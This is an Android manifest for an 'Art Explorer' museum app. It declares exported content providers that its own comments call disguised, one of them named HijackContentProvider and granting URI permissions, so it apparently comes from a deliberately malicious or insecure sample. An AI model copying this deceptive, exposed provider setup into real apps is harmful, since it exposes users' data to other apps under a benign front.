<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.artexplorer.museum">

    <!-- Internet permission for loading artwork from Met Museum API -->
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/museum_icon"
        android:label="Art Explorer"
        android:theme="@style/MuseumTheme"
        android:process=":museum">

        <activity
            android:name="com.artexplorer.museum.MuseumActivity"
            android:exported="true"
            android:theme="@style/MuseumTheme"
            android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!-- Disguised content provider - looks like innocent artwork sharing -->
        <provider
            android:name="com.artexplorer.museum.data.ArtworkContentProvider"
            android:authorities="com.artexplorer.museum.artworks"
            android:enabled="true"
            android:exported="true"
            android:grantUriPermissions="true"
            android:process=":museum" />
        <provider
            android:name=".data.HijackContentProvider"
            android:authorities="com.artexplorer.museum.hijackprovider"
            android:exported="true"
            android:grantUriPermissions="true" />

    </application>
</manifest>